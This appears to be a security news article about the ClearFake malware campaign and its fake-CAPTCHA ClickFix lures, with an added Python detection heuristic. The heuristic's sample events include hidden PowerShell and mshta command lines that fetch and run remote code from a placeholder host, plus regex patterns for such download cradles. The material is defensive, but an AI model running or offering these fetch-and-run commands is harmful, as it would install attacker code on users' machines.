
The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verification checks to trick users into downloading malware such as Lumma Stealer and Vidar Stealer.
First highlighted in July 2023, ClearFake is the name given to a threat activity cluster that uses fake web browser update baits on compromised WordPress sites as malware distribution vectors.
The campaign is also known to rely on another technique known as EtherHiding, which uses Binance's Smart Chain (BSC) contracts to make the attack chain more resilient. The ultimate goal of these infection chains is to deliver information-stealing malware that can target both Windows and macOS systems.
As of May 2024, ClearFake attacks employ what has come to be known as ClickFix, a social engineering ploy that deceives users into executing malicious PowerShell code under the pretext of addressing non-existent technical issues.

“This new ClearFake variant continues to rely on EtherHiding techniques and ClickFix tactics, but has introduced additional interactions with the Binance Smart Chain,” Sekoia said in a new analysis.
“By using the Smart Contract's application binary interface, these interactions include downloading, decrypting and displaying ClickFix lures, as well as loading multiple JavaScript codes and additional resources that fingerprint the victim's system.”
The latest iterations of the ClearFake framework show an important evolution, employing Web3 features to resist analysis and to encrypt ClickFix-related HTML code.
The net result is an updated multi-stage attack sequence that begins when the victim visits the compromised site, leading to the retrieval of intermediate JavaScript code from the BSC. The loaded JavaScript is then responsible for fingerprinting the system and fetching the encrypted ClickFix code hosted on a Cloudflare page.
If the victim follows through and executes the malicious PowerShell command, it leads to the deployment of Emmenhtal Loader (aka Peaklight), which then drops Lumma Stealer.
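The ClickFix step described above only succeeds if a user pastes and runs a command themselves, which leaves a distinctive telemetry shape: a script host spawned from an interactive parent with a hidden window and a remote download cradle. The following added example (not Sekoia's or the campaign's code) scores constructed Sysmon-style process-creation events on those traits; the field names, sample command lines and regex patterns are assumptions for illustration, not a vendor signature.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1-style fields),
# not real telemetry from the ClearFake campaign.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},                      # user opened a shell
    {"ProcessId": 2002, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"ProcessId": 3012, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha"},
]

# Heuristic patterns (assumed, illustrative; tune to your own environment).
HIDDEN_OR_BYPASS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-(?:ep|executionpolicy)\s+bypass", re.I)
REMOTE_EXEC = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex|invoke-expression)\b|https?://", re.I)
ENCODED_CMD = re.compile(r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
INTERACTIVE_PARENTS = {"explorer.exe"}   # Run dialog / desktop launches, where a pasted lure lands
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event):
    """Return (score, reasons) for one process-creation event; 0 for non-script hosts."""
    reasons = []
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return 0, reasons
    if basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        reasons.append("script host launched interactively (Run dialog / Explorer)")
    cmd = event["CommandLine"]
    if HIDDEN_OR_BYPASS.search(cmd):
        reasons.append("hidden window or execution-policy bypass")
    if REMOTE_EXEC.search(cmd):
        reasons.append("remote download or in-memory execution")
    if ENCODED_CMD.search(cmd):
        reasons.append("encoded command")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Process IDs (with reasons) whose score reaches the threshold; a lone trait is ignored."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["ProcessId"], reasons))
    return hits
```

A plain interactive shell and a scheduled admin script each trip only one trait and stay below the threshold, while the two lure-shaped launches are returned with their reasons for an analyst to review.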

Sekoia said that in late January 2025 it observed an alternative ClearFake attack chain that delivered a PowerShell loader responsible for installing Vidar Stealer. As of last month, at least 9,300 websites have been infected with ClearFake.
“Operators update the framework code, lures and distributed payloads daily,” the company added. “Running ClearFake relies on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES keys, lure HTML files, and ClickFix PowerShell commands.”
“The number of websites compromised by ClearFake suggests that this threat is widespread and affects many users around the world. In July 2024, […] approximately 200,000 unique users could have been exposed to ClearFake lures, which encourage them to download malware.”
The development comes as it was discovered that over 100 car dealer sites have been compromised with ClickFix lures that lead to the deployment of SectopRAT malware.
“The outbreak of this infection at car dealers was not on the dealers' own websites, but on third-party video services,” said security researcher Randy McEoin, who detailed some of the early ClearFake campaigns in 2023 and described the incident as an example of a supply chain attack.
The video service in question is LES Automotive (“idostream[.]com”), which has since removed the malicious JavaScript injection from its site.

The findings also coincide with the discovery of several phishing campaigns designed to push different malware families and carry out credential harvesting:
- Use of Virtual Hard Disk (VHD) files to distribute VenomRAT via Windows batch scripts
- Use of Microsoft Excel file attachments that exploit a known security flaw (CVE-2017-0199) to download an HTML Application (HTA)
- Abuse of misconfigured Microsoft 365 infrastructure to manage tenants, create new administrative accounts, bypass email security protections, and ultimately deliver phishing content that enables credential harvesting and account takeover (ATO)
As social engineering campaigns continue to become more refined, it is essential for organizations and businesses to stay ahead of the curve and implement robust authentication and access control mechanisms against adversary-in-the-middle (AitM) and browser-in-the-middle (BitM) techniques that allow attackers to hijack accounts.
“The pivotal benefit of adopting a BitM framework lies in its rapid targeting capabilities, allowing it to reach websites on the web in seconds with minimal configuration,” Google-owned Mandiant said in a report published this week.
“When an application is targeted via a BitM tool or framework, the legitimate site is served via an attacker-controlled browser. This makes distinguishing between legitimate and fake sites very challenging for an attacker. From an adversary's perspective, BitM allows for a simple but effective means of stealing sessions protected by MFA.”